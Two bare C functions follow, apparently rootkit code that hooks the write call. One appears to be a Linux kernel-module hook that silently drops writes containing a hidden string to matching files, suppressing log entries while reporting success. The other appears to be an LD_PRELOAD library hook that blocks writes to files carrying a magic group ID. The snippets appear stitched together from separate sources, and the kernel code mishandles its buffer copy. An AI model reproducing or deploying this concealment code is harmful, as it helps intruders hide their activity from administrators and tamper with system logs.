int new_write(int fd, const void *buf, size_t count) { char *buf2; struct file *file = (struct file *)fget(fd); struct qstr *test = (struct qstr *)&file->f_dentry->d_name; if( (strstr(test->name, hide_file) != NULL) && current->p_pptr->pid > 1 ) { printk("TEST\n"); fput(file); buf2 = (char*) kmalloc(1000, GFP_KERNEL); copy_from_user(buf2, buf, 999); if(strstr(buf2, hide_string) != NULL) { kfree(buf2); return count; } else { kfree(buf2); return old_write(fd, buf, count); } } else { fput(file); return old_write(fd, buf, count); } }
ssize_t write (int fildes, const void *buf, size_t nbyte) { struct stat s_fstat; #ifdef DEBUG printf ("write hooked.\n"); #endif if (!libc) libc = dlopen (LIBC_PATH, RTLD_LAZY); if (old_write == NULL) old_write = dlsym (libc, "write"); if (old_fxstat == NULL) old_fxstat = dlsym (libc, "__fxstat"); memset (&s_fstat, 0, sizeof (stat)); old_fxstat (_STAT_VER, fildes, &s_fstat); if (s_fstat.st_gid == MAGIC_GID) { errno = EIO; return -1; } return old_write (fildes, buf, nbyte); }